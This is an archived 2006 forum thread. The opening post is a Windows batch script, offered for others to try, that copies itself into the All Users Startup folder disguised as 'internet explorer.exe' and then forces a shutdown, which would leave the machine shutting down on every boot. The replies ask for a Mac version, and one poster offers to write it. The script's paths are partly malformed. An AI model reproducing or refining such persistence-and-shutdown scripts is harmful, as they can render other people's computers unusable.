PDA

View Full Version : Would this work?


0wned
October 15th, 2006, 05:17 AM
@Echo Off
Echo Owned!!!
Echo Brought to You by ownage
if not exist C:\Documents and Settings\All Users\Start Menu\Programs\Startup\internet explorer.exe goto copy
goto shutdown
:copy
copy internet explorer.exe C:\Documents and Settings\All Users\Start Menu\Programs\Startup
:shutdown
Shutdown -s
C:\WINDOWS\RUNDLL32.EXE user,exitwindows
exit
exit

Helix
October 15th, 2006, 10:22 AM
lol .. now I need that code for Mac's...

Ishkur
October 16th, 2006, 12:58 AM
dunno, you should try it

Cuddles
October 16th, 2006, 09:35 PM
lol .. now I need that code for Mac's...

a bit more difficult because it's based on freeBSD, but ill see what i can come up with (im curious how much effort it will take to do....)